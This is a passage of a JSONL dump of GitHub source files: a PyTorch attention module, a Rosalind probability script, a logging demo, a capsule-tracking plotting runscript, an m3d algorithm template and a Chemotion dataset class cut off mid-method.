+{"seq_id":"23299060378","text":"import torch\nimport torch.nn as nn\n\nclass Attention(nn.Module):\n    def __init__(self,din,dout):\n        super(Attention, self).__init__()\n        self.softmax = nn.Softmax(dim=-1)\n        self.scale = din**-0.5\n        self.q = nn.Linear(din,dout)\n        self.k = nn.Linear(din,dout)\n        self.v = nn.Linear(din,dout)\n\n    def forward(self,x):\n        q = self.q(x)\n        k = self.k(x)\n        v = self.v(x)\n        score = torch.matmul(q,k.transpose(-2,-1))*self.scale\n        score = self.softmax(score)\n        out = torch.matmul(score,v)\n        return out\n\nclass MultHeadSelfAttention(nn.Module):\n    def __init__(self,dim_in,d_model,n_head):\n        super(MultHeadSelfAttention, self).__init__()\n        self.d_model = d_model\n        self.n_head = n_head\n        self.dim_in = dim_in\n        self.scale = (d_model//n_head)**-0.5\n\n        self.q = nn.Linear(dim_in,d_model)\n        self.k = nn.Linear(dim_in,d_model)\n        self.v = nn.Linear(dim_in,d_model)\n        self.softmax = nn.Softmax(dim=-1)\n\n    def forward(self,x):\n        b, n, _ = x.shape\n        ndim = self.d_model//self.n_head\n        # split the projections into heads: (batch, head, seq, ndim)\n        q = self.q(x).reshape(b, n, self.n_head, ndim).transpose(1, 2)\n        k = self.k(x).reshape(b, n, self.n_head, ndim).transpose(1, 2)\n        v = self.v(x).reshape(b, n, self.n_head, ndim).transpose(1, 2)\n        # scaled dot-product attention per head, then merge the heads back\n        score = self.softmax(torch.matmul(q, k.transpose(-2, -1))*self.scale)\n        out = torch.matmul(score, v)\n        return out.transpose(1, 2).reshape(b, n, self.d_model)\n\n\n\nnet = Attention(5,5)\nx = torch.randn(2,5,5)\nout = net(x)\nprint(out)","repo_name":"XuYiHan30319/MedicalImaging","sub_path":"AttentionNet/Attention.py","file_name":"Attention.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40947954138","text":"# http://rosalind.info/problems/iprb/\nfin = open('rosalind_iprb.txt', 'r')\nfout = open('iprb_out.txt', 'w+')\npopulation = 
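The crossing loop above keeps the bridge as a growing list with manual pops. An equivalent sketch using a fixed-length `collections.deque`, which makes the one-slot-per-tick advance of the bridge explicit (it reproduces the sample answers from the record's test comments):

```python
# A deque-based version of the bridge simulation above: the bridge is a
# fixed-length window that shifts one slot per unit of time.
from collections import deque

def crossing_time(bridge_len, max_load, weights):
    bridge = deque([0] * bridge_len, maxlen=bridge_len)
    time = 0
    for w in weights:
        while True:
            time += 1
            if sum(bridge) - bridge[0] + w <= max_load:
                bridge.append(w)   # the truck drives on as the window shifts
                break
            bridge.append(0)       # the bridge advances empty this tick
    return time + bridge_len       # the last truck still has to roll off

print(crossing_time(2, 10, [7, 4, 5, 6]))   # 8
print(crossing_time(100, 100, [10]))        # 101
print(crossing_time(100, 100, [10] * 10))   # 110
```

Because `maxlen` is set, each `append` implicitly pops the leftmost slot, so `sum(bridge) - bridge[0] + w` is exactly the load after the next one-unit advance.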
fin.readline().split()\n\nprob = []\npopulation = [int(n) for n in population]\ns = sum(population)\n\nfor i in range(len(population)-1):\n\tfst = population[i]\n\tfor j in range(i,len(population)):\n\t\tscd = population[j]\n\t\tif i==j:\n\t\t\tprob.append((fst/s)*((scd-1)/(s-1)))\n\t\telse:\n\t\t\tprob.append(2*(fst/s)*(scd/(s-1)))\n\nprob[3] = prob[3]*(3/4)\nprob[4] = prob[4]*(1/2)\nfout.write(str(sum(prob)))\n\nfin.close()\nfout.close()\n","repo_name":"a5834929/UCLA-CM224_Computational_Genetics","sub_path":"Programming/iprb.py","file_name":"iprb.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3892827540","text":"import logging\n#logging.basicConfig(level=logging.DEBUG)\nlogging.basicConfig(\n    filename=\"pizza.log\",\n    level=logging.DEBUG,\n    format=\"%(asctime)s:%(levelname)s:%(message)s\"\n    )\nclass Pizza():\n    def __init__(self,name,price):\n        self.name = name\n        self.price = price\n        logging.debug(\"Pizza created: {} Rate : ${}\".format(self.name,self.price))\n\n    def make(self,q= 1):\n        logging.debug(\"Made : {} {} pizza(s)\".format(q,self.name))\n\n    def eat(self,q=1):\n        logging.debug(\"Ate : {} {} pizza(s)\".format(q,self.name))\np1 = Pizza(\"BBQ chicken\",4)\np1.make()\np1.eat()\np2 = Pizza(\"Thousand islands\",5)\np2.make()\np2.eat()\n\n","repo_name":"hellstrikes13/sudipython","sub_path":"pizza_oo.py","file_name":"pizza_oo.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27308605043","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 08 15:31:09 2016\n\n@author: mbbxkeh2\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n#import cv2\nimport matplotlib.pyplot as plt\nplt.close('all')\nimport numpy as np\n#import os\nimport sys\nsys.path.append('C:\\\\Users\\\\Edgar\\\\Dropbox\\\\PhD\\\\Python\\\\OpenCV\\\\capsule_tracking') #Machine Schuster G.21\nsys.path.append('C:\\\\Users\\\\mbbxkeh2\\\\Dropbox\\\\PhD\\\\Python\\\\OpenCV\\\\capsule_tracking') #Aland Turing 2.105\nsys.path.append('/home/magda/Dropbox/PhD/Python/OpenCV/capsule_tracking') #Aland Turing 2.105\n\nimport general as gen\nimport analysis as ana\nimport t_junction as tj\nimport ReadOutputFile as TJ_ROF\nimport ReadResultsFile as TJ_RRF\nimport track_capsule_TJ as TR\nimport CompareRuns as CP_TJ\n\n\ndef runfunc():\n    # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch170615-002\\\\T-Junction\\\\2015-06-22\\\\Batch170615-002_#2\\\\'\n    # folder = 'Batch170615-002-#2-%dFPS-35mlPmin-2\\\\' %FPS\n    \n    # directory = 
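The Rosalind IPRB record above sums the probability contribution of every mating pair explicitly. The same expected value in closed form, where k, m, n count homozygous dominant, heterozygous, and homozygous recessive individuals:

```python
# Closed-form version of the IPRB computation above: probability that a
# random mating pair produces an offspring showing the dominant phenotype.
def dominant_probability(k, m, n):
    t = k + m + n
    # recessive offspring come from (n,n) pairs always, (n,m) pairs half the
    # time, and (m,m) pairs a quarter of the time (ordered-pair counting)
    p_rec = (n * (n - 1) + n * m + 0.25 * m * (m - 1)) / (t * (t - 1))
    return 1.0 - p_rec

print(round(dominant_probability(2, 2, 2), 5))  # -> 0.78333, the sample answer
```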
'M:\\\\EdgarHaener\\\\Capsules\\\\Batch260615-001\\\\T-Junction\\\\2015-07-01\\\\Batch260615-001-#17\\\\'\n # folder = 'Batch260615-001-#17-%dFPS-70mlPmin-1\\\\' %FPS\n \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150730-1\\\\T-Junction\\\\2015-08-04\\\\GelBead150730-1-#1\\\\'\n # folder = 'GelBead150730-1-#1-%dFPS-35mlPmin-1\\\\' %FPS\n \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch010615-001\\\\T-Junction\\\\Capsule#1\\\\'\n # folder = 'Batch010615-001_#1-030615-5kcSt-1S-%dFPS-70mlPmin-5\\\\' %FPS\n \n \n \n \n \n # centerline, width, pPmm, geometryTJ = None, None, None, None\n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150715-1\\\\T-Junction\\\\2015-07-22\\\\GelBead150715-1-#4\\\\'; geometryTJ=[35, 121, 535, 709] #GelBeads150715-1 \n # centerline, width, pPmm = 622, 174, 22.3; directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150715-1\\\\T-Junction\\\\2015-07-22\\\\GelBead150715-1-#4\\\\'; geometryTJ=[37, 121, 535, 709]; #GelBeads150715-1\n # folder = 'GelBead150715-1-#4-%dFPS-70mlPmin-7\\\\' %FPS\n # path=directory+folder\n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150730-1\\\\T-Junction\\\\2015-08-04\\\\GelBead150730-1-#1\\\\'; centerline, width, pPmm = 624.5, 175, 22.4; geometryTJ=[32, 119, 537, 712] #GelBeads150730-1 #11\n # directory = '/mnt/MCND/EdgarHaener/Capsules/GelBeads150730-1/T-Junction/2015-08-04/GelBead150730-1-#1/'; \n # path = '/mnt/MCND/EdgarHaener/Capsules/GelBeads150730-1/T-Junction/2015-08-04/GelBead150730-1-#1/GelBead150730-1-#1-10FPS-5mlPmin-1' #GelBeads150730-1 #1\n # centerline, width, pPmm = 646, 174, 22.3; geometryTJ=[28, 114, 559, 733] #Batch260615-001 #17\n \n # centerline, width, pPmm = 637, 175, 22.4; geometryTJ=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n # centerline, width, pPmm = 637, 175, 22.4; geometryTJ=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n # centerline, width, pPmm = 631.5, 175, 22.4; geometryTJ=[73, 158, 544, 719] #Batch170615-002 #5 5ml/min\n # centerline, width, pPmm = 632, 176, 22.4; geometryTJ=[34, 120, 543, 719] #Batch170615-002 #5 Other\n # geometryTJ=[33, 118, 541, 717] #Batch170615-002 #2\n # centerline, width, pPmm = 631, 174, 22.3; geometryTJ=[39, 125, 544, 718] #Batch010615-001 #1\n # centerline, width, pPmm = 623, 176, 22.5; geometryTJ=[120, 535, 711] #Batch270715-001 #5\n \n # centerline, width, pPmm = 628, 176, 22.6; geometryTJ=[119, 540, 716] #Batch100815-001-#8\n # centerline, width, pPmm = 633, 166, 20.2; geometryTJ=[105, 550, 716] #Batch100815-001 #6 & #7\n # centerline, width, pPmm = 634.5, 165, 20.2; geometryTJ=[105, 552, 717] #Batch100815-001 #3 & #4\n \n \n #geometryTJ = [Top Daugther Channel, Bottom Daugther Channel, left side Main Channel, right side Main Channel]\n\n #=============================================================================\n # GelBead150715-1\n #=============================================================================\n name4 = 'GelBead150715-1#1'\n \n centerline, width, pPmm = 622, 174, 22.3; geometryTJ=[37, 121, 535, 709]; #GelBeads150715-1\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150715-1\\\\T-Junction\\\\2015-07-22\\\\GelBead150715-1-#4\\\\'; \n FPS=40; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-70mlPmin-6\\\\' %FPS\n \n path = directory + folder #Test2\\\\'\n pathRESLT4 = directory + '2015-07-22-GelBead150715-1-#4_Results.txt'\n #=============================================================================\n \n #=============================================================================\n # 
Batch040615-002\n #=============================================================================\n name3 = 'Batch040615-002#1'\n \n \n centerline, width, pPmm3 = 635.5, 173, 22.2; geometryTJ=[36, 122, 549, 722] #\n \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch040615-002\\\\T-Junction\\\\Capsule#1\\\\'\n FPS3=10; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-5mlPmin-4\\\\' %FPS3\n \n path3 = directory + folder #Test2\\\\'\n pathRESLT3 = directory + 'T-Junction-Capsule#1_Results.txt'\n #=============================================================================\n \n #=============================================================================\n # Batch260615-001\n #=============================================================================\n name2 = 'Batch260615-001#17'\n \n centerline, width, pPmm2 = 646, 174, 22.3; geometryTJ2=[28, 114, 559, 733] #Batch260615-001 #17\n \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch260615-001\\\\T-Junction\\\\2015-07-01\\\\Batch260615-001-#17\\\\'\n FPS2=140; folder = 'Batch260615-001-#17-%dFPS-70mlPmin-1\\\\' %FPS2\n \n path2 = directory + folder #Test2\\\\'\n pathRESLT2 = directory + '2015-07-01-Batch260615-001-#17_Results.txt'\n #=============================================================================\n \n #=============================================================================\n # Batch120615-004\n #=============================================================================\n name1 = 'Batch120615-004#4'\n \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-4\\\\' %FPS\n FPS1 = 100; folder = 'Batch120615-001-#4-%dFPS-50mlPmin-1\\\\' %FPS1\n \n if FPS1 == 30:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n else:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n \n path1 = directory + folder #Test2\\\\'\n pathRESLT1 = directory + 'Batch120615-004-T-Junction_Results.txt'\n #=============================================================================\n \n \n \n \n #=============================================================================\n # Run stuff\n #=============================================================================\n \n sp = \"M:\\\\EdgarHaener\\\\Capsules\\\\PlotScripts\\\\T-Junction-RESLT\\\\\"\n \n #tj.tryout(directory)\n #tj.averageTrajectories(directory = directory,\n # savePath = sp, \n # pPmm = pPmm, \n # batchName = name, \n # forPub=False)\n \n \n # Plot Trajectory\n# tj.plotTrajecotry(path = path, pPmm=pPmm, geometryTJ = geometryTJ, savepath = sp, forPub=True)\n# commandsToGeneratePlotsForThesis()\n# areaAndPerimeter(sp)\n \n TJ1 = TJ_RRF.ResultsClass(pathRESLT1)\n TJ2 = TJ_RRF.ResultsClass(pathRESLT2)\n TJ3 = TJ_RRF.ResultsClass(pathRESLT3)\n TJ4 = TJ_RRF.ResultsClass(pathRESLT4)\n \n inst = [TJ1, TJ2, TJ3, TJ4]\n names = [name1, name2, name3, name4]\n dia = [3.77, 3.77, 3.87, 4.00]\n pPmm = [22.4, 22.3, 22.2, 22.3]\n force = [3.1, 6.2, 9.2, 180]\n\n CP_TJ.plotMeanMaxAcceleration(listOfInstances =inst, \n listOfNames = names, pPmm=pPmm,\n savepath=sp, title = '', savename ='',\n show=True, forPub=True) \n# TandNDTvsQ(inst, names, sp)\n# plotGauss()\n# plotTimeAndRelaxation(inst, names,dia, pPmm, force, sp)\n# migrationVelocity(sp)\n# velocity(sp)\n# acceleration(sp)\n \ndef velocity(sp):\n #=============================================================================\n # Batch040615-002\n 
#=============================================================================\n centerline, width, pPmm3 = 635.5, 173, 22.2; geometryTJ=[36, 122, 549, 722] # \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch040615-002\\\\T-Junction\\\\Capsule#1\\\\'\n FPS3=10; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-5mlPmin-4\\\\' %FPS3 \n path3 = directory + folder #Test2\\\\'\n #=============================================================================\n tj.plotVelocity(path3, pPmm3, FPS3, savepath = sp, \n forPub=True, TJlim=[5.8,10.1], lim=[0, 16, 0, 4])\n FPS3=140; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-70mlPmin-4\\\\' %FPS3 \n path3 = directory + folder #Test2\\\\'\n tj.plotVelocity(path3, pPmm3, FPS3, savepath = sp, \n forPub=True, TJlim=[0.7, 1.1], lim=[0.3, 1.6, 0, 60])\n \n \n #=============================================================================\n # Batch120615-004\n #=============================================================================\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS1 = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-10\\\\' %FPS1\n if FPS1 == 30:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n else:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n path1 = directory + folder #Test2\\\\'\n tj.plotVelocity(path1, pPmm1, FPS1, savepath = sp, \n forPub=True, TJlim=[7.5, 12.5], lim=[2, 21, 0, 4.5], cutoff=21)\n FPS1 = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-12\\\\' %FPS1\n path1 = directory + folder #Test2\\\\'\n tj.plotVelocity(path1, pPmm1, FPS1, savepath = sp, \n forPub=True, TJlim=[7.5, 15], lim=[2, 21, 0, 4.5])\n\ndef acceleration(sp):\n #=============================================================================\n # Batch120615-004\n #=============================================================================\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS1 = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-10\\\\' %FPS1\n if FPS1 == 30:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n else:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n path1 = directory + folder #Test2\\\\'\n tj.plotAcceleration(path1, pPmm1, FPS1, savepath = sp, \n forPub=True, TJlim=[7.5, 12.5], lim=[2, 21, -4.5, 4.5], cutoff=21)\n FPS1 = 100; folder = 'Batch120615-001-#4-%dFPS-50mlPmin-1\\\\' %FPS1\n path1 = directory + folder #Test2\\\\'\n tj.plotAcceleration(path1, pPmm1, FPS1, savepath = sp, \n forPub=True, TJlim=[0.9, 1.4], lim=[0.0, 2, -200, 200.0])\n \ndef migrationVelocity(sp): \n #=============================================================================\n # Batch260615-001\n #============================================================================= \n centerline, width, pPmm2 = 646, 174, 22.3; geometryTJ2=[28, 114, 559, 733] #Batch260615-001 #17\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch260615-001\\\\T-Junction\\\\2015-07-01\\\\Batch260615-001-#17\\\\'\n FPS2=140; folder = 'Batch260615-001-#17-%dFPS-70mlPmin-1\\\\' %FPS2\n path2 = directory + folder \n \n #=============================================================================\n # Batch120615-004\n #=============================================================================\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS1 
= 100; folder = 'Batch120615-001-#4-%dFPS-50mlPmin-1\\\\' %FPS1\n if FPS1 == 30:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n else:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n path1 = directory + folder #Test2\\\\'\n \n #Plots of Migration Velocity\n anPos=[0.69, -3.5, 0.8, -6.0, 1.10, 0.2, 0.8, -2.0,]\n tj.plotMigrationVelocity(path2, pPmm2, FPS2, geometryTJ2, savepath = sp, \n forPub=True, lim=[0.6, 1.25, -10, 3.5], anPos= anPos)\n #Batch120615-001-nr4-100FPS-50mlPmin-1\n anPos=[1.29, -2, 1.4, -6, 1.92, 0.3, 1.4, -2,]\n tj.plotMigrationVelocity(path1, pPmm1, FPS1, geometryTJ1, savepath = sp, \n forPub=True, lim=[1.1, 2.1, -10, 3.5], anPos= anPos)\n\n \ndef plotTimeAndRelaxation(inst, names, dia, pPmm, force, sp):\n\n CP_TJ.plotTimeVsOffcentre(listOfClassInstances =inst, \n listOfNames = names, \n listOfD0 = dia, pPmm = pPmm,\n nrCap=0, \n savepath=sp, \n show=True, forPub=False,\n absoluteV=False, NDT=True)\n\n CP_TJ.plotTimeVsOffcentre(listOfClassInstances =inst, \n listOfNames = names, \n listOfD0 = dia, pPmm = pPmm,\n nrCap=0, \n savepath=sp, \n show=True, forPub=True,\n absoluteV=False, NDT=True)\n\n CP_TJ.plotTimeVsOffcentre(listOfClassInstances =inst, \n listOfNames = names, \n listOfD0 = dia, pPmm = pPmm,\n nrCap=0, \n savepath=sp, \n show=True, forPub=False, \n absoluteV=True, NDT=True)\n \n CP_TJ.plotTimeVsOffcentre(listOfClassInstances =inst, \n listOfNames = names, \n listOfD0 = dia, pPmm = pPmm,\n nrCap=0, \n savepath=sp, \n show=True, forPub=True, \n absoluteV=True, NDT=True)\n\n CP_TJ.plotMinSpeed(listOfInstances =inst, listOfNames = names, \n listOfd0 = dia, savepath=sp, title = '', \n savename ='', show=True, nonDim=True, forPub=False)\n \n CP_TJ.plotRelaxationDistanceVsCa(listOfInstances =inst, listOfNames = names, \n pPmm = pPmm, force = force, \n listOfD0 = dia, savepath=sp, title = '', \n savename ='', \n show=True, forPub=False, ND=True)\n CP_TJ.plotRelaxationDistanceVsCa(listOfInstances =inst, listOfNames = names, \n pPmm = pPmm, force = force, \n listOfD0 = dia, savepath=sp, title = '', \n savename ='', \n show=True, forPub=True, ND=False)\n \n CP_TJ.plotRelaxationTimeVsCa(listOfInstances =inst, listOfNames = names, \n force = force, savepath=sp, title = '', \n savename ='', \n show=True, forPub=False, ND=True)\n \n CP_TJ.plotRelaxationTime(listOfInstances =inst, listOfNames = names, \n savepath=sp, title = '', savename ='', \n show=True, forPub=True, ND=False) \n\n CP_TJ.plotRelaxationTimeVsCa(listOfInstances =inst, listOfNames = names, \n force = force, savepath=sp, title = '', \n savename ='', \n show=True, forPub=True, ND=False) \n\n CP_TJ.plotRelaxationTime(listOfInstances =inst, listOfNames = names, \n savepath=sp, title = '', savename ='', \n show=True, forPub=True, ND=True) \n\n CP_TJ.plotRelaxationTimeVsCa(listOfInstances =inst, listOfNames = names, \n force = force, savepath=sp, title = '', \n savename ='', \n show=True, forPub=True, ND=True) \n\n CP_TJ.plotRelaxationSpeed(listOfInstances =inst, listOfNames = names, \n pPmm=pPmm, savepath=sp, title = '', \n savename ='', show=True, forPub=True)\n\n \ndef gaus(x,a,x0,sigma):\n return a*np.exp(-(x-x0)**2/(2*sigma**2))\n \ndef plotGauss():\n a=1.0\n x0=0.0\n x=np.arange(-1.0, 1.0, 0.001)\n plt.figure()\n \n sigma=1.0\n plt.plot(x, gaus(x,a,x0,sigma), label='1.0')\n sigma=0.1\n plt.plot(x, gaus(x,a,x0,sigma), label='0.1')\n sigma=10.0\n plt.plot(x, gaus(x,a,x0,sigma), 
label='10.0')\n plt.legend()\n \ndef TandNDTvsQ(inst, names, sp):\n CP_TJ.plotTvsQ(listOfInstances = inst, \n listOfNames = names, \n savepath=sp, \n title = '', \n savename ='', \n show=True, \n forPub=True, \n nondimensionalise=False)\n\n CP_TJ.plotTvsQ(listOfInstances = inst, \n listOfNames = names, \n savepath=sp, \n title = '', \n savename ='', \n show=True, \n forPub=True, \n nondimensionalise=True)\n\ndef averageOffset(pathRESLT1, pathRESLT2, pathRESLT3,pathRESLT4):\n TJ1 = TJ_RRF.ResultsClass(pathRESLT1)\n print(TJ1.offCentre)\n Lic = TJ1.offCentre/22.4\n TJ2 = TJ_RRF.ResultsClass(pathRESLT2)\n TJ3 = TJ_RRF.ResultsClass(pathRESLT3)\n TJ4 = TJ_RRF.ResultsClass(pathRESLT4)\n Lic = np.concatenate((Lic, TJ2.offCentre/22.3))\n Lic = np.concatenate((Lic, TJ3.offCentre/22.2))\n Lic = np.concatenate((Lic, TJ4.offCentre/22.3))\n \n print(\"Mean Lic = %f\" %(np.mean(Lic)))\n \ndef commandsToGeneratePlotsForThesis():\n sp = \"M:\\\\EdgarHaener\\\\Capsules\\\\PlotScripts\\\\T-Junction-RESLT\\\\\"\n trajectoryPlots(sp)\n\ndef trajectoryPlots(savepath):\n # Batch120615-004\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-4\\\\' %FPS\n path1 = directory + folder #Test2\\\\'\n FPS = 80; folder = 'Batch120615-001-#4-%dFPS-40mlPmin-6\\\\' %FPS\n path2 = directory + folder #Test2\\\\'\n centerline, width, pPmm = 637, 175, 22.4; geometryTJ=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n \n tj.plotTrajecotry(path = path1, pPmm=pPmm, geometryTJ = geometryTJ, savepath = savepath, forPub=True)\n tj.plotTrajecotry(path = path2, pPmm=pPmm, geometryTJ = geometryTJ, savepath = savepath, forPub=True)\n \ndef areaAndPerimeter(savepath):\n # Batch120615-004\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS1 = 20; folder = 'Batch120615-001-#4-%dFPS-10mlPmin-4\\\\' %FPS1 ; path1 = directory + folder #Test2\\\\'\n FPS2 = 100; folder = 'Batch120615-001-#4-%dFPS-50mlPmin-1\\\\' %FPS2 ; path2 = directory + folder #Test2\\\\'\n centerline, width, pPmm = 637, 175, 22.4; geometryTJ=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n \n TJ_ROF.plotAreaAndPerimeter(path1, FPS1, pPmm, 3.0*FPS1, 5.75*FPS1 , xmax=10.0, savepath=savepath)\n TJ_ROF.plotAreaAndPerimeter(path2, FPS2, pPmm, 0.9*FPS2, 1.4*FPS2, xmax=2.2, savepath=savepath)\n \n\n # Batch040615-002\n centerline, width, pPmm = 635.5, 173, 22.2; geometryTJ=[36, 122, 549, 722] #\n \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch040615-002\\\\T-Junction\\\\Capsule#1\\\\'\n FPS1=10; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-5mlPmin-2\\\\' %FPS1 ; path1 = directory + folder \n FPS2=140; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-70mlPmin-6\\\\' %FPS2 ; path2 = directory + folder \n \n TJ_ROF.plotAreaAndPerimeter(path1, FPS1, pPmm, 5.0*FPS1, 9*FPS1 , xmax=16.0, savepath=savepath)\n TJ_ROF.plotAreaAndPerimeter(path2, FPS2, pPmm, 0.575*FPS2, 0.875*FPS2, xmax=1.5, savepath=savepath)\n\n\nif __name__ == \"__main__\":\n# print(\"Starting 'funfunc'\")\n runfunc()","repo_name":"EdgarMCR/Track-Capsules-OpenCV","sub_path":"runscript_T-Junction.py","file_name":"runscript_T-Junction.py","file_ext":"py","file_size_in_byte":21742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7653280699","text":"from m3d.hadoop.algorithm.algorithm_hadoop import AlgorithmHadoop\nfrom m3d.hadoop.algorithm.scala_classes import ScalaClasses\nfrom m3d.hadoop.emr.emr_system import EMRSystem\n\n\nclass 
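`plotGauss` above only plots the unnormalised Gaussian `gaus` for a few sigmas. As an illustration (not something the original runscript does), the same function shape can be fitted to noisy synthetic data with scipy's `curve_fit`, which is a common use for exactly this helper:

```python
# The unnormalised Gaussian from plotGauss above, fitted to synthetic data.
# The data below is made up purely for demonstration.
import numpy as np
from scipy.optimize import curve_fit

def gaus(x, a, x0, sigma):
    return a * np.exp(-(x - x0) ** 2 / (2 * sigma ** 2))

rng = np.random.default_rng(0)
x = np.linspace(-1.0, 1.0, 200)
y = gaus(x, 1.0, 0.1, 0.25) + rng.normal(0.0, 0.02, x.size)

popt, _ = curve_fit(gaus, x, y, p0=(1.0, 0.0, 0.5))
print("a=%.2f x0=%.2f sigma=%.2f" % tuple(popt))
```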
AlgorithmAlgorithmTemplate(AlgorithmHadoop):\n\n def __init__(self, execution_system, algorithm_instance, algorithm_params):\n \"\"\"\n Initialize Algorithm Algorithm Template\n\n :param execution_system: an instance of EMRSystem object\n :param algorithm_instance: name of the algorithm instance\n :param algorithm_params: algorithm configuration\n \"\"\"\n\n super(AlgorithmAlgorithmTemplate, self).__init__(execution_system, algorithm_instance, algorithm_params)\n\n self.source_table = self._execution_system.db_lake + \".\" + self._parameters[\"source_table\"]\n # you can use a source location as parquet files on the lake instead of a hive table\n # make sure not the repeat the full path again on the acon file if you have the following concatenation logic\n # self.source_location = os.path.join(\"s3://\",\n # self._execution_system.bucket_lake, self._parameters[\"source_location\"])\n self.target_table = self._execution_system.db_lake + \".\" + self._parameters[\"target_table\"]\n\n self.output_dictionary = {\n \"source_table\": self.source_table,\n # you can use a source location as parquet files on the lake instead of a hive table\n # \"source_location\": self.source_location,\n \"target_table\": self.target_table,\n \"date_from\": self._parameters[\"date_from\"],\n \"date_to\": self._parameters[\"date_to\"]\n }\n\n execution_system.add_cluster_tags({\n EMRSystem.EMRClusterTag.SOURCE_TABLE: self.source_table,\n EMRSystem.EMRClusterTag.TARGET_TABLE: self.target_table\n })\n\n def get_scala_class(self):\n return ScalaClasses.ALGORITHM_TEMPLATE\n\n def build_params(self):\n return self.output_dictionary\n","repo_name":"adidas/m3d-api","sub_path":"m3d/hadoop/algorithm/algorithm_algorithm_template.py","file_name":"algorithm_algorithm_template.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"78"} +{"seq_id":"17923127725","text":"import json\nimport os.path\nimport re\nimport uuid\n\nfrom chemotion_api.connection import Connection\n\nfrom chemotion_api.generic_segments import GenericSegments\nfrom chemotion_api.utils import add_to_dict, parse_generic_object_json, \\\n clean_generic_object_json\n\nfrom requests.exceptions import RequestException\n\nclass Dataset(dict):\n def __init__(self, session: Connection, json_data: dict):\n self.id = json_data.get('id')\n self.name = json_data.get('name')\n self.description = json_data.get('description')\n ds_json = json_data.get('dataset')\n if ds_json is not None:\n res = parse_generic_object_json(ds_json)\n super().__init__(res.get('values'))\n self._mapping = res.get('obj_mapping')\n self._session = session\n self._json_data = json_data\n\n def write_zip(self, destination=''):\n image_url = \"/api/v1/attachments/zip/{}\".format(self.id)\n res = self._session.get(image_url)\n if res.status_code != 200:\n raise ConnectionRefusedError('{} -> {}'.format(res.status_code, res.text))\n\n if not os.path.exists(destination) or os.path.isdir(destination):\n regex_file_name = re.search('filename=\"([^\"]+)',res.headers['Content-Disposition'] )\n destination = os.path.join(destination, regex_file_name.groups()[0])\n\n with open(destination, 'wb+') as f:\n f.write(res.content)\n\n return destination\n\n def write_data_set_xlsx(self, destination=''):\n image_url = \"/api/v1/attx/dataset/{}\".format(self.id)\n res = self._session.get(image_url)\n if res.status_code != 200:\n raise ConnectionRefusedError('{} -> {}'.format(res.status_code, res.text))\n\n if not 
